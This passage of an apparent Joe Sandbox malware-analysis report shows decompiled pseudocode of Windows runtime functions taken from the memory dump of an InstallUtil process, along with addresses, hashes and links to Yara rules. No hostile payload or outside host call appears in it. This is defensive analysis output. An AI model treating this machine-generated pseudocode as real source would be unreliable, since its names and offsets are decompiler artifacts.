				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E012D7B60(0, _t61, 0x12a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E012D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L012E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01303d4c
0x01303d50
0x01303d55
0x01303d5e
0x0133e79a
0x00000000
0x0133e79a
0x01303d68
0x0133e789
0x01303d9d
0x01303da3
0x01303daf
0x01303db5
0x01303dbc
0x01303dc4
0x01303dc9
0x01303dce
0x0133e7ae
0x0133e7ae
0x01303dde
0x01303de2
0x01303de7
0x01303e0d
0x01303e13
0x01303e16
0x01303e1e
0x01303e25
0x01303e28
0x00000000
0x00000000
0x01303e2a
0x01303e2f
0x01303e37
0x01303e37
0x00000000
0x01303e37
0x01303e31
0x00000000
0x01303e31
0x01303e20
0x01303e20
0x01303e35
0x00000000
0x01303de9
0x01303de9
0x01303de9
0x01303dee
0x01303dfd
0x01303dff
0x01303e02
0x01303e05
0x01303e05
0x00000000
0x01303df0
0x01303de7
0x0133e78f
0x0133e794
0x01303d79
0x01303d84
0x01303d89
0x01303d8e
0x00000000
0x0133e7a4
0x01303d96
0x01303d9a
0x00000000
0x01303d9a
0x00000000
0x0133e794
0x01303d6e
0x01303d73
0x00000000
0x0133e7b5
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892e833d6cfd7d559601aca1830408ea98a3b4bf4d68892b99c16f465402625b
Instruction ID: 7d50c06a65385aa89fb58d950ec16e168c5f41b96eae5d00fecdf8fddf27718b
Opcode Fuzzy Hash: 892e833d6cfd7d559601aca1830408ea98a3b4bf4d68892b99c16f465402625b
Instruction Fuzzy Hash: 4B31CB32A01615DFD7268F2EC861A7ABBE9FF85708B05806AE949CB790E730D840C795

Uniqueness

Uniqueness Score: -1.00%

Function 012FA61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x13a0220);
				E0131D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x13b7b9c; // 0x0
				_t55 = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0131D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x13b7b10 =  *0x13b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x13b536c; // 0x77575368
					if( *_t51 != 0x13b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x13b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x13b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E012FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x012fa61c
0x012fa61e
0x012fa623
0x012fa628
0x012fa62b
0x012fa62d
0x012fa648
0x012fa64a
0x012fa64f
0x01339b44
0x012fa6ec
0x012fa6f1
0x012fa6f1
0x012fa655
0x012fa657
0x012fa65a
0x012fa65d
0x012fa662
0x012fa663
0x012fa667
0x012fa668
0x012fa66d
0x012fa706
0x012fa706
0x01339bda
0x01339be6
0x01339beb
0x00000000
0x01339beb
0x012fa679
0x01339b7a
0x00000000
0x01339b7a
0x012fa683
0x012fa6f4
0x012fa6f7
0x012fa6f9
0x012fa6fd
0x012fa6a0
0x012fa6a0
0x012fa6ad
0x012fa6af
0x012fa6b4
0x01339ba7
0x01339bac
0x00000000
0x00000000
0x01339bc6
0x01339bce
0x01339bd1
0x01339bd3
0x01339bd3
0x00000000
0x01339bd1
0x012fa6bd
0x012fa6c3
0x012fa6c6
0x012fa6d2
0x012fa701
0x012fa704
0x00000000
0x012fa704
0x012fa6d4
0x012fa6d6
0x012fa6d9
0x012fa6db
0x012fa6e1
0x012fa6e6
0x012fa6e8
0x012fa6e8
0x012fa6ea
0x00000000
0x012fa6ea
0x012fa688
0x012fa692
0x012fa694
0x012fa699
0x00000000
0x00000000
0x012fa69d
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8de319a4d6c526914b3d83ce11926430af9a4ac9b43b4ec02d9ff3dd7d12427
Instruction ID: 437ce3336c046b2c4f34737b1640f4087e10dda67bf825ac264fedeefa9fedf3
Opcode Fuzzy Hash: e8de319a4d6c526914b3d83ce11926430af9a4ac9b43b4ec02d9ff3dd7d12427
Instruction Fuzzy Hash: 98417B75A21205DFDB18CF58C880BA9BBF1FF89708F18806DEA09AB344D774A941CF54

Uniqueness

Uniqueness Score: -1.00%

Function 012EC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E012EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E012E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01398D34(_v8, _t80);
					}
					E012E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E012DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01398833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E012DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0130B180();
						if(_a4 != 0) {
							E012E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E012EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E012EBB2D(_t16, _t15);
						E012EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E012DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E012DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E012DFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x012ec18d
0x012ec18f
0x012ec191
0x012ec19b
0x012ec1a0
0x012ec1d4
0x012ec1de
0x01332d6e
0x012ec1e4
0x012ec1e4
0x012ec1e4
0x012ec1ec
0x01332d7d
0x01332d7d
0x012ec1f3
0x012ec1ff
0x01332d88
0x01332d8d
0x01332d94
0x01332d94
0x01332d9f
0x01332da4
0x01332dab
0x01332db0
0x01332db2
0x01332db3
0x01332db4
0x01332dbc
0x01332dc3
0x01332dc3
0x012ec205
0x012ec205
0x012ec208
0x012ec20e
0x012ec211
0x012ec216
0x012ec219
0x012ec21f
0x012ec222
0x012ec22c
0x012ec234
0x012ec23a
0x012ec23f
0x012ec245
0x012ec24b
0x012ec251
0x012ec25a
0x012ec276
0x012ec27d
0x012ec27d
0x012ec25c
0x012ec25c
0x00000000
0x012ec25e
0x012ec1a4
0x012ec1aa
0x012ec1b3
0x012ec265
0x012ec26c
0x012ec26c
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 17cff37357c040ef35e67f55b78a60fbd50b67489c4c2dfee1c96af4f130f07b
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 08316672A1054BAFDB04EBF8C494BF9FBD4BF52204F48415AC41C4B241DB74AA1ACBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01347016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01347016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x13bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01346B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01346B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E012E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01309AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0130B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L012E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01347016
0x0134701e
0x0134702b
0x01347033
0x01347037
0x0134703c
0x0134703e
0x01347041
0x01347045
0x0134704a
0x01347050
0x01347055
0x0134705a
0x01347062
0x01347062
0x0134705a
0x01347064
0x01347064
0x01347067
0x01347071
0x01347096
0x0134709b
0x013470a2
0x013470a6
0x013470a7
0x013470ad
0x013470b3
0x013470b6
0x013470bb
0x013470c3
0x013470c3
0x013470c6
0x013470cd
0x013470dd
0x013470e0
0x013470e2
0x013470e2
0x013470ee
0x01347101
0x013470f0
0x013470f9
0x013470f9
0x0134710a
0x0134710e
0x01347112
0x01347117
0x01347118
0x01347118
0x013470bb
0x0134711d
0x01347123
0x01347131
0x01347131
0x01347136
0x0134713d
0x0134713e
0x0134713f
0x0134714a
0x0134714a
0x01347084
0x01347088
0x00000000
0x0134708e
0x0134708e
0x01347092
0x00000000
0x01347092

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f1c295d04ab80f1e515c5cd1de01a56ba79cc8494700cee16ef98f46cf28f6
Instruction ID: 005157862298e604af2ca457fea9e9e9f25be558f99894d90d544c146939d80a
Opcode Fuzzy Hash: b5f1c295d04ab80f1e515c5cd1de01a56ba79cc8494700cee16ef98f46cf28f6
Instruction Fuzzy Hash: F831C0726047919FD321DF2CC840A6AB7E9FF88704F044A29F99987690E730E904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 012FA70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E012FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x13b7b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x13b7b10 = 8;
					 *0x13b7b14 = 0x13b7b0c;
					 *0x13b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E012FA990(0x13b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L012FA840(__edx, __ecx, __ecx, _t52, 0x13b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x13b7b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x13b7b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x13b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L012E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x13b7b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E0130F3E0(_t50,  *0x13b7b14, _t8 >> 3);
						_t28 =  *0x13b7b14; // 0x0
						__eflags = _t28 - 0x13b7b0c;
						if(_t28 != 0x13b7b0c) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x13b7b14 = _t50;
						_t48 = _v12;
						 *0x13b7b10 = _t9;
						goto L6;
					}
					 *0x13b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x012fa713
0x012fa714
0x012fa717
0x012fa71d
0x012fa720
0x012fa722
0x012fa727
0x012fa74a
0x012fa754
0x012fa75e
0x012fa768
0x012fa76a
0x012fa773
0x012fa78b
0x012fa790
0x012fa792
0x012fa741
0x012fa741
0x012fa743
0x012fa749
0x012fa749
0x012fa732
0x012fa73a
0x012fa797
0x012fa79d
0x012fa7a3
0x012fa7a9
0x012fa7b6
0x012fa7bc
0x012fa7ca
0x012fa7e0
0x012fa7e2
0x012fa7e4
0x01339bf2
0x00000000
0x01339bf2
0x012fa7ed
0x012fa7f2
0x012fa800
0x012fa805
0x012fa80d
0x012fa812
0x01339c08
0x01339c08
0x012fa818
0x012fa81b
0x012fa821
0x012fa824
0x00000000
0x012fa824
0x012fa7ae
0x00000000
0x012fa7ae
0x012fa73c
0x012fa73e
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 185c22beeedb0facda93715bf5f107375235268a1be44de4854395b009bb6f6b
Instruction ID: 5ac14528d3a2d5e99111e0f53fd3bba6ddeab9082fcc155a7b239009ab306f09
Opcode Fuzzy Hash: 185c22beeedb0facda93715bf5f107375235268a1be44de4854395b009bb6f6b
Instruction Fuzzy Hash: D2319EB1720201DBD729CB18D8C1F69BBF9FBC4714F14096AE70A97A84E7B0A901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012F61A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E012F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E012F5E50(0x12a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01399D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E012CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x012f61b3
0x012f61b5
0x012f61bd
0x012f61c3
0x012f61c7
0x012f61d2
0x012f61ff
0x012f61ff
0x012f6201
0x012f6207
0x012f6207
0x012f61d4
0x012f61d9
0x00000000
0x00000000
0x012f61df
0x012f61e2
0x00000000
0x00000000
0x012f61e6
0x012f61e8
0x012f61ee
0x012f61ee
0x012f61f9
0x0133762f
0x01337632
0x01337635
0x01337639
0x01337640
0x0133766e
0x01337675
0x00000000
0x00000000
0x01337681
0x01337689
0x0133768d
0x01337691
0x01337695
0x01337699
0x013376af
0x013376b5
0x013376b7
0x013376b7
0x013376d7
0x013376dc
0x00000000
0x013376dc
0x013376a2
0x013376a9
0x01337651
0x01337653
0x01337653
0x01337656
0x01337656
0x00000000
0x01337656
0x01337644
0x01337646
0x01337648
0x01337648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b3b4b3af005e5b24dcd90bc08be9b183e6e26573da83d301ebdf88a38cde7c
Instruction ID: 30c66751fa9705a1f7dd8757e8745f2a158c76b8045893818e9de632c9089dae
Opcode Fuzzy Hash: e6b3b4b3af005e5b24dcd90bc08be9b183e6e26573da83d301ebdf88a38cde7c
Instruction Fuzzy Hash: 9D317AB16157028FE360CF1DC950B2AFBE5FB88B14F05496DEA989B351E7B0E804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 012CAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E012CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x13bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x13b7b9c; // 0x0
					_t53 = L012E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0130B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0130F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L012D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E012F5E50(0x12ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E012FB230(_v32, _v28, 0x12ac2d8, 1,  &_v24);
								_t28 = E012CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x012caa25
0x012caa29
0x012caa2d
0x012caa30
0x012caa37
0x012caa3c
0x01324458
0x01324458
0x01324472
0x01324474
0x01324476
0x012caa64
0x012caa74
0x0132447c
0x01324483
0x01324492
0x012caa52
0x012caa54
0x012caa5e
0x013244a8
0x013244ad
0x013244af
0x013244b6
0x013244b6
0x013244b9
0x013244bc
0x013244cd
0x013244d3
0x013244d6
0x013244e1
0x013244e1
0x013244e6
0x013244e8
0x013244fb
0x013244fb
0x013244e8
0x00000000
0x012caa5e
0x01324476
0x012caa42
0x012caa46
0x012caa48
0x012caa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

